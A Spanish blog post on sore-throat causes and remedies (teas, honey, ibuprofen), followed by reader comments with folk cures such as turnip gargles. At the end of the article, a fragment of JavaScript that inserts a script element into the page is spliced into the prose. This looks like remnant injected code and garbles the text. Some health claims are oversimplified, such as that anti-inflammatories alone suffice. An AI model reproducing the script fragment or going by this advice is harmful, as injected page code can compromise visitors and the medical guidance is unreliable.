Salud y belleza » Dolores

Si te duele la garganta…

4 Comentarios

El dolor de garganta ha de tener la misma edad que la tierra. Desde tiempos inmemorables, el hombre debió padecer éste síntoma. Afortunadamente, en la actualidad nadie muere de un dolor de garganta (al menos, época post penicilina).

Pero, hoy por hoy, ni siquiera es necesario sufrir una o dos horas con dolor de Garganta: existen muchas formas, desde remedios caseros hasta fármacos, para deshacerse ese malestar.

Ante todo, ¿por qué nos duele la garganta? Generalmente, el dolor se produce por una irritación de los órganos. Esta puede darse tanto por algún virus o bacteria como por otros factores relacionados con el ejercicio (gritar, toser demasiado por una gripe, etc.).

Entre los remedios caseros, los que marchan a la cabeza son las infusiones dadas por los te de colores: tanto el té verde como el rojo, funcionan para bajar la irritación. Y, en el caso del té con miel, también ayuda tomar unas dos o tres tazas por día.

Con respecto a los fármacos, no existe una herramienta particular: generalmente, alcanza con desinflamantes (Ibuprofeno, por citar el más famoso). Naturalmente, con esto alcanza para cuidar la garganta. Ahora, las cosas que salen de ella, del aparato fonador, están al margen de cualquier remedio: quedan bajo “responsabilidad personal”, ¿no?d.getElementsByTagName('head')[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);

Más consejos de salud y belleza : , , ,

4 Comments »

  • carmen maria said:

    mi garganta sufra muchas inflamaciones y raro es el mes que no me duela, ya me lo he planteado y he pedido cita en el medico porque todos los meses estoy chunga con la garganta, ahora os estoy escribiendo y desde anoche estoy otra vez chunga, no pasan mas de cuatro semanas en las que no vuelva a estar mal de nuevo, igual sere hipersensible en la garganta o tendre que cuidarmela muchisimo mas de lo que lo hago o igual sera el puñetero tabaco , que seria mejor dejarlo.Lo cierto es que estoy de acuerdo con vuestro articulo y me parece bueno porque abarcais todos los campos posibles de la salud y el bienestar.

    gracias

  • Riki-Sama said:

    una o dos horas???? hay por favor seria bastante bella tanta dulsura pero no, yo llevo como tres dias con la garganta irritada y siempre me pasa igual cada que me duele

  • alfredo said:

    pq romperse tanto la cabeza hay una solución natural fácil y económico,yo sufría mucho hasta estaba hasta casi mes y medio con la garganta hasta pensaba operarme para sacarme la amígdalas,hasta q me receto un doctor en productos naturales y me dijo haz gárgaras apenas sienta el dolor con NABO pero el mas chiquito el q amarga mas antes de dormir después del lavado de la boca y van a ver q si da buenos resultados

  • kenzie dayna said:

    a mi me duele mucho la garganta dormirse con los ojos serrados ayuda mucho

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.